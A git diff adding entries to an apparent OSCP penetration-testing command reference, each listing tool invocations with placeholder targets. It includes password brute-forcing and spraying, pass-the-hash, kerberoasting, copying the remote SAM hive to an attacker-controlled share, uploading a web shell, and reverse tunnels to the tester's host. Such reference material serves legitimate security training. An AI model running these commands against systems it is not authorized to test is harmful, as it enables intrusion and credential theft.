diff --git a/_commands/autorecon.md b/_commands/autorecon.md new file mode 100644 index 0000000..c0ee587 --- /dev/null +++ b/_commands/autorecon.md @@ -0,0 +1,22 @@ +--- +command: | + autorecon $IP +variants: + - label: single + command: | + autorecon $IP + - label: targets-file + command: | + autorecon -t targets.txt + - label: all-ports + command: | + autorecon $IP --port-scans top-100-ports --service-scans default +description: Multi-threaded recon wrapper that runs nmap then per-service enumeration automatically +os: [Linux] +category: [oscp, cli] +service: [SMB, HTTP, DNS] +phase: [Enumeration] +references: + - https://www.kali.org/tools/autorecon/ + - https://github.com/Tib3rius/AutoRecon +--- diff --git a/_commands/certipy-auth.md b/_commands/certipy-auth.md new file mode 100644 index 0000000..89ef8f5 --- /dev/null +++ b/_commands/certipy-auth.md @@ -0,0 +1,20 @@ +--- +variants: + - label: pfx + command: | + certipy-ad auth -pfx administrator.pfx -dc-ip $DCIP + - label: pfx-user + command: | + certipy-ad auth -pfx user.pfx -username $USER -domain $DOMAIN -dc-ip $DCIP + - label: ldap-shell + command: | + certipy-ad auth -pfx user.pfx -dc-ip $DCIP -ldap-shell +description: Authenticate with a certificate via PKINIT to recover a Kerberos TGT and the account NT hash +os: [Linux] +category: [oscp, cli] +service: [ADCS, Kerberos] +phase: [CredAccess, Exploitation] +references: + - https://www.kali.org/tools/certipy-ad/ + - https://github.com/ly4k/Certipy +--- diff --git a/_commands/cewl.md b/_commands/cewl.md new file mode 100644 index 0000000..95b8620 --- /dev/null +++ b/_commands/cewl.md @@ -0,0 +1,11 @@ +--- +command: | + cewl -d 2 -m 5 -w words.txt $URL +description: Spider a site to depth 2 and build a custom wordlist of words 5 chars or longer +os: [Linux] +category: [oscp, cli] +service: [HTTP] +phase: [Cracking] +references: + - https://www.kali.org/tools/cewl/ +--- diff --git a/_commands/chisel.md b/_commands/chisel.md new file mode 100644 index 0000000..36d5cee --- /dev/null +++ b/_commands/chisel.md @@ -0,0 +1,26 @@ +--- +variants: + - label: server-reverse + command: | + chisel server -p $LPORT --reverse + - label: client-reverse-socks + command: | + chisel client $LHOST:$LPORT R:socks + - label: client-reverse-fwd + command: | + chisel client $LHOST:$LPORT R:$LPORT:127.0.0.1:3306 + - label: server-forward-socks + command: | + chisel server -p $LPORT --socks5 + - label: client-forward-socks + command: | + chisel client $IP:$LPORT socks +description: Fast TCP/UDP tunnel over HTTP for reverse SOCKS proxies and port forwarding through a foothold +os: [Linux, Windows] +category: [oscp, cli] +service: [HTTP] +phase: [Pivoting] +references: + - https://gitlab.com/kalilinux/packages/chisel + - https://github.com/jpillora/chisel +--- diff --git a/_commands/curl.md b/_commands/curl.md new file mode 100644 index 0000000..ecf6f9d --- /dev/null +++ b/_commands/curl.md @@ -0,0 +1,25 @@ +--- +variants: + - label: get + command: | + curl -i $URL + - label: headers + command: | + curl -I $URL + - label: post-json + command: | + curl -X POST -H "Content-Type: application/json" -d '{"user":"admin"}' $URL + - label: put-upload + command: | + curl -X PUT --data-binary @shell.php $URL/shell.php + - label: proxy + command: | + curl -k -x http://127.0.0.1:8080 $URL +description: Transfer data over HTTP for manual web testing, file upload, and proxying through Burp +os: [Linux] +category: [oscp, cli] +service: [HTTP] +phase: [Enumeration] +references: + - https://www.kali.org/tools/curl/ +--- diff --git a/_commands/dig.md b/_commands/dig.md new file mode 100644 index 0000000..c6c9ea0 --- /dev/null +++ b/_commands/dig.md @@ -0,0 +1,25 @@ +--- +variants: + - label: a-record + command: | + dig $DOMAIN @$IP + - label: any + command: | + dig ANY $DOMAIN @$IP + - label: zone-transfer + command: | + dig AXFR $DOMAIN @$IP + - label: reverse + command: | + dig -x $IP @$IP + - label: ns + command: | + dig NS $DOMAIN @$IP +description: Query a DNS server for records and attempt a zone transfer against the target nameserver +os: [Linux] +category: [oscp, cli] +service: [DNS] +phase: [Enumeration] +references: + - https://www.kali.org/tools/bind9/#dig +--- diff --git a/_commands/dnsenum.md b/_commands/dnsenum.md new file mode 100644 index 0000000..3d01143 --- /dev/null +++ b/_commands/dnsenum.md @@ -0,0 +1,11 @@ +--- +command: | + dnsenum --dnsserver $IP $DOMAIN +description: Enumerate DNS records, attempt zone transfers, and brute force subdomains for a domain +os: [Linux] +category: [oscp, cli] +service: [DNS] +phase: [Enumeration] +references: + - https://www.kali.org/tools/dnsenum/ +--- diff --git a/_commands/enum4linux.md b/_commands/enum4linux.md new file mode 100644 index 0000000..227eed3 --- /dev/null +++ b/_commands/enum4linux.md @@ -0,0 +1,16 @@ +--- +variants: + - label: all-null + command: | + enum4linux -a $IP + - label: all-creds + command: | + enum4linux -a -u $USER -p $PASSWORD $IP +description: Enumerate SMB shares, users, groups, and policy over null or authenticated sessions +os: [Linux] +category: [oscp, cli] +service: [SMB] +phase: [Enumeration] +references: + - https://www.kali.org/tools/enum4linux/ +--- diff --git a/_commands/evil-winrm.md b/_commands/evil-winrm.md index 37cd02c..c106ab4 100644 --- a/_commands/evil-winrm.md +++ b/_commands/evil-winrm.md @@ -1,23 +1,20 @@ --- variants: - - label: creds + - label: password command: | evil-winrm -i $IP -u $USER -p $PASSWORD - - label: hash + - label: pth command: | evil-winrm -i $IP -u $USER -H $HASH - - label: ticket + - label: scripts command: | - evil-winrm -i $IP -u $USER -k - - label: cert - command: | - evil-winrm -i $IP -c pub.pem -k priv.pem -S -r $DOMAIN -description: Interactive WinRM shell, by auth method. + evil-winrm -i $IP -u $USER -p $PASSWORD -s /scripts -e /executables +description: Interactive WinRM shell, by auth method, with upload, download, and script loading os: [Linux] category: [oscp, cli] -have: [hash, ticket, cert] service: [WinRM] -phase: [Exploitation] +phase: [Exploitation, LateralMovement] references: + - https://www.kali.org/tools/evil-winrm/ - https://github.com/Hackplayers/evil-winrm --- diff --git a/_commands/ffuf.md b/_commands/ffuf.md index 5ae0bc3..c5c6d85 100644 --- a/_commands/ffuf.md +++ b/_commands/ffuf.md @@ -1,11 +1,23 @@ --- -command: | - ffuf -u http://$IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 300 -fs 3142 -description: Directory fuzz a web server filtering by response size. +variants: + - label: dir + command: | + ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt + - label: vhost + command: | + ffuf -u $URL -H "Host: FUZZ.$DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 4242 + - label: post-login + command: | + ffuf -u $URL/login -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 200 + - label: params + command: | + ffuf -u "$URL/?FUZZ=value" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt +description: Fast web fuzzer for directories, vhosts, login fields, and parameters with response filtering os: [Linux] category: [oscp, cli] service: [HTTP] phase: [Enumeration] references: + - https://www.kali.org/tools/ffuf/ - https://github.com/ffuf/ffuf --- diff --git a/_commands/fierce.md b/_commands/fierce.md new file mode 100644 index 0000000..3adf7ed --- /dev/null +++ b/_commands/fierce.md @@ -0,0 +1,11 @@ +--- +command: | + fierce --domain $DOMAIN --dns-servers $IP +description: Locate non-contiguous IP space and hostnames for a domain via DNS scanning +os: [Linux] +category: [oscp, cli] +service: [DNS] +phase: [Enumeration] +references: + - https://www.kali.org/tools/fierce/ +--- diff --git a/_commands/finalrecon.md b/_commands/finalrecon.md new file mode 100644 index 0000000..1dc099f --- /dev/null +++ b/_commands/finalrecon.md @@ -0,0 +1,17 @@ +--- +variants: + - label: full + command: | + finalrecon --full --url $URL + - label: headers-whois + command: | + finalrecon --headers --whois --url $URL +description: All in one web recon covering headers, SSL, whois, DNS, subdomains, and crawling +os: [Linux] +category: [oscp, cli] +service: [HTTP] +phase: [Enumeration] +references: + - https://www.kali.org/tools/finalrecon/ + - https://github.com/thewhiteh4t/FinalRecon +--- diff --git a/_commands/ftp.md b/_commands/ftp.md new file mode 100644 index 0000000..e986310 --- /dev/null +++ b/_commands/ftp.md @@ -0,0 +1,16 @@ +--- +variants: + - label: connect + command: | + ftp $IP + - label: anonymous + command: | + ftp anonymous@$IP +description: Connect to an FTP service to test anonymous access and browse the file store +os: [Linux] +category: [oscp, cli] +service: [FTP] +phase: [Enumeration] +references: + - https://www.kali.org/tools/tnftp/ +--- diff --git a/_commands/gobuster.md b/_commands/gobuster.md new file mode 100644 index 0000000..001412c --- /dev/null +++ b/_commands/gobuster.md @@ -0,0 +1,20 @@ +--- +variants: + - label: dir + command: | + gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt + - label: dns + command: | + gobuster dns -d $DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt + - label: vhost + command: | + gobuster vhost -u $URL -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain +description: Brute force web content, DNS subdomains, and virtual hosts by mode +os: [Linux] +category: [oscp, cli] +service: [HTTP, DNS] +phase: [Enumeration] +references: + - https://www.kali.org/tools/gobuster/ + - https://github.com/OJ/gobuster +--- diff --git a/_commands/hydra.md b/_commands/hydra.md new file mode 100644 index 0000000..8426267 --- /dev/null +++ b/_commands/hydra.md @@ -0,0 +1,22 @@ +--- +variants: + - label: ssh + command: | + hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://$IP + - label: ftp + command: | + hydra -l $USER -P /usr/share/wordlists/rockyou.txt ftp://$IP + - label: http-post-form + command: | + hydra -l $USER -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" + - label: rdp + command: | + hydra -l $USER -P /usr/share/wordlists/rockyou.txt rdp://$IP +description: Online password brute forcer, by service, for SSH, FTP, HTTP forms, and RDP +os: [Linux] +category: [oscp, cli] +service: [SSH, FTP, HTTP, RDP] +phase: [CredAccess] +references: + - https://www.kali.org/tools/hydra/ +--- diff --git a/_commands/impacket-reg.md b/_commands/impacket-reg.md new file mode 100644 index 0000000..0e8256d --- /dev/null +++ b/_commands/impacket-reg.md @@ -0,0 +1,20 @@ +--- +variants: + - label: query + command: | + impacket-reg $DOMAIN/$USER:$PASSWORD@$IP query -keyName HKLM\SOFTWARE -s + - label: save-hive + command: | + impacket-reg $DOMAIN/$USER:$PASSWORD@$IP save -keyName HKLM\SAM -o \\$LHOST\share\sam.save + - label: add-key + command: | + impacket-reg $DOMAIN/$USER:$PASSWORD@$IP add -keyName HKLM\SOFTWARE\Test -v Flag -vt REG_SZ -vd value +description: Read and write the remote registry over SMB to query keys or dump SAM, SYSTEM, and SECURITY hives +os: [Linux] +category: [oscp, cli] +service: [RPC, SMB] +phase: [CredAccess, Enumeration] +references: + - https://www.kali.org/tools/impacket-scripts/ + - https://github.com/fortra/impacket +--- diff --git a/_commands/impacket-smbclient.md b/_commands/impacket-smbclient.md new file mode 100644 index 0000000..20d3195 --- /dev/null +++ b/_commands/impacket-smbclient.md @@ -0,0 +1,17 @@ +--- +variants: + - label: password + command: | + impacket-smbclient $DOMAIN/$USER:$PASSWORD@$IP + - label: pth + command: | + impacket-smbclient $DOMAIN/$USER@$IP -hashes :$HASH +description: Interactive SMB client to list shares and get or put files, with pass the hash support +os: [Linux] +category: [oscp, cli] +service: [SMB] +phase: [Enumeration, LateralMovement] +references: + - https://www.kali.org/tools/impacket-scripts/ + - https://github.com/fortra/impacket +--- diff --git a/_commands/john-extractors.md b/_commands/john-extractors.md new file mode 100644 index 0000000..d8db667 --- /dev/null +++ b/_commands/john-extractors.md @@ -0,0 +1,34 @@ +--- +variants: + - label: ssh2john + command: | + ssh2john id_rsa > hash.txt + - label: zip2john + command: | + zip2john secret.zip > hash.txt + - label: rar2john + command: | + rar2john secret.rar > hash.txt + - label: office2john + command: | + office2john document.docx > hash.txt + - label: bitlocker2john + command: | + bitlocker2john -i drive.img > hash.txt + - label: keepass2john + command: | + keepass2john database.kdbx > hash.txt + - label: pdf2john + command: | + pdf2john document.pdf > hash.txt + - label: crack + command: | + john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt +description: Extract a crackable hash from an encrypted file with the 2john helpers, then crack it with John +os: [Linux] +category: [oscp, cli] +service: [Files] +phase: [Cracking] +references: + - https://www.kali.org/tools/john/#bitlocker2john +--- diff --git a/_commands/kerbrute.md b/_commands/kerbrute.md new file mode 100644 index 0000000..8a7468a --- /dev/null +++ b/_commands/kerbrute.md @@ -0,0 +1,19 @@ +--- +variants: + - label: userenum + command: | + kerbrute userenum -d $DOMAIN --dc $DCIP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt + - label: passwordspray + command: | + kerbrute passwordspray -d $DOMAIN --dc $DCIP users.txt $PASSWORD + - label: bruteuser + command: | + kerbrute bruteuser -d $DOMAIN --dc $DCIP /usr/share/wordlists/rockyou.txt $USER +description: Brute force and enumerate AD accounts through Kerberos pre-auth without locking on userenum +os: [Linux] +category: [oscp, cli] +service: [Kerberos] +phase: [CredAccess, Enumeration] +references: + - https://github.com/ropnop/kerbrute +--- diff --git a/_commands/medusa.md b/_commands/medusa.md new file mode 100644 index 0000000..4e80f32 --- /dev/null +++ b/_commands/medusa.md @@ -0,0 +1,19 @@ +--- +variants: + - label: ssh + command: | + medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M ssh + - label: ftp + command: | + medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M ftp + - label: smb + command: | + medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M smbnt +description: Parallel network login brute forcer, by service module, for SSH, FTP, and SMB +os: [Linux] +category: [oscp, cli] +service: [SSH, FTP, SMB] +phase: [CredAccess] +references: + - https://www.kali.org/tools/medusa/ +--- diff --git a/_commands/nbtscan.md b/_commands/nbtscan.md new file mode 100644 index 0000000..2945f37 --- /dev/null +++ b/_commands/nbtscan.md @@ -0,0 +1,11 @@ +--- +command: | + nbtscan $IP/24 +description: Scan a subnet for NetBIOS names to map hostnames, workgroups, and logged in users +os: [Linux] +category: [oscp, cli] +service: [SMB] +phase: [Enumeration] +references: + - https://www.kali.org/tools/nbtscan/ +--- diff --git a/_commands/nfs-cat.md b/_commands/nfs-cat.md new file mode 100644 index 0000000..705bca5 --- /dev/null +++ b/_commands/nfs-cat.md @@ -0,0 +1,22 @@ +--- +variants: + - label: discover + command: | + nfs-ls -D nfs://$IP + - label: list-export + command: | + nfs-ls nfs://$IP/export + - label: read-file + command: | + nfs-cat nfs://$IP/export/path/file.txt + - label: read-as-root + command: | + nfs-cat nfs://$IP/export/path/file.txt?uid=0&gid=0 +description: Read a file off an NFS export with libnfs, including spoofing uid and gid 0 to bypass root squash +os: [Linux] +category: [oscp, cli] +service: [NFS] +phase: [Enumeration, PrivEsc] +references: + - https://github.com/sahlberg/libnfs +--- diff --git a/_commands/nikto.md b/_commands/nikto.md new file mode 100644 index 0000000..5416cdb --- /dev/null +++ b/_commands/nikto.md @@ -0,0 +1,11 @@ +--- +command: | + nikto -h $URL +description: Scan a web server for known vulnerabilities, dangerous files, and misconfigurations +os: [Linux] +category: [oscp, cli] +service: [HTTP] +phase: [Enumeration] +references: + - https://www.kali.org/tools/nikto/ +--- diff --git a/_commands/nxc-ftp.md b/_commands/nxc-ftp.md new file mode 100644 index 0000000..baba1e8 --- /dev/null +++ b/_commands/nxc-ftp.md @@ -0,0 +1,16 @@ +--- +variants: + - label: auth + command: | + nxc ftp $IP -u $USER -p $PASSWORD + - label: list + command: | + nxc ftp $IP -u $USER -p $PASSWORD --ls +description: NetExec over FTP to validate credentials and list the remote directory +os: [Linux] +category: [oscp, cli] +service: [FTP] +phase: [Enumeration] +references: + - https://www.netexec.wiki/ +--- diff --git a/_commands/nxc-ldap.md b/_commands/nxc-ldap.md new file mode 100644 index 0000000..b201b17 --- /dev/null +++ b/_commands/nxc-ldap.md @@ -0,0 +1,22 @@ +--- +variants: + - label: bloodhound + command: | + nxc ldap $IP -u $USER -p $PASSWORD --bloodhound -c All --dns-server $DCIP + - label: asreproast + command: | + nxc ldap $IP -u $USER -p $PASSWORD --asreproast asrep.txt + - label: kerberoast + command: | + nxc ldap $IP -u $USER -p $PASSWORD --kerberoasting kerb.txt + - label: delegation + command: | + nxc ldap $IP -u $USER -p $PASSWORD --find-delegation +description: NetExec over LDAP for BloodHound collection, roasting, and delegation discovery +os: [Linux] +category: [oscp, cli] +service: [LDAP, AD] +phase: [Enumeration, CredAccess] +references: + - https://www.netexec.wiki/ +--- diff --git a/_commands/nxc-mssql.md b/_commands/nxc-mssql.md new file mode 100644 index 0000000..889a44a --- /dev/null +++ b/_commands/nxc-mssql.md @@ -0,0 +1,19 @@ +--- +variants: + - label: auth + command: | + nxc mssql $IP -u $USER -p $PASSWORD --local-auth + - label: query + command: | + nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT @@version" + - label: exec + command: | + nxc mssql $IP -u $USER -p $PASSWORD -x "whoami" +description: NetExec over MSSQL to authenticate, run queries, and execute commands via xp_cmdshell +os: [Linux] +category: [oscp, cli] +service: [MSSQL] +phase: [Exploitation] +references: + - https://www.netexec.wiki/ +--- diff --git a/_commands/nxc-rdp.md b/_commands/nxc-rdp.md new file mode 100644 index 0000000..e220ffa --- /dev/null +++ b/_commands/nxc-rdp.md @@ -0,0 +1,19 @@ +--- +variants: + - label: auth + command: | + nxc rdp $IP -u $USER -p $PASSWORD + - label: screenshot + command: | + nxc rdp $IP -u $USER -p $PASSWORD --screenshot + - label: nla-screenshot + command: | + nxc rdp $IP -u '' -p '' --nla-screenshot +description: NetExec over RDP to test access and screenshot the logon or session desktop +os: [Linux] +category: [oscp, cli] +service: [RDP] +phase: [Enumeration] +references: + - https://www.netexec.wiki/ +--- diff --git a/_commands/nxc-ssh.md b/_commands/nxc-ssh.md new file mode 100644 index 0000000..81654d1 --- /dev/null +++ b/_commands/nxc-ssh.md @@ -0,0 +1,16 @@ +--- +variants: + - label: auth + command: | + nxc ssh $IP -u $USER -p $PASSWORD + - label: exec + command: | + nxc ssh $IP -u $USER -p $PASSWORD -x "id" +description: NetExec over SSH to spray credentials and run a command on success +os: [Linux] +category: [oscp, cli] +service: [SSH] +phase: [Exploitation, CredAccess] +references: + - https://www.netexec.wiki/ +--- diff --git a/_commands/nxc-winrm.md b/_commands/nxc-winrm.md new file mode 100644 index 0000000..901e44d --- /dev/null +++ b/_commands/nxc-winrm.md @@ -0,0 +1,19 @@ +--- +variants: + - label: auth + command: | + nxc winrm $IP -u $USER -p $PASSWORD + - label: pth + command: | + nxc winrm $IP -u $USER -H $HASH + - label: exec + command: | + nxc winrm $IP -u $USER -p $PASSWORD -x "whoami" +description: NetExec over WinRM to validate access and run commands, with pass the hash support +os: [Linux] +category: [oscp, cli] +service: [WinRM] +phase: [Exploitation, LateralMovement] +references: + - https://www.netexec.wiki/ +---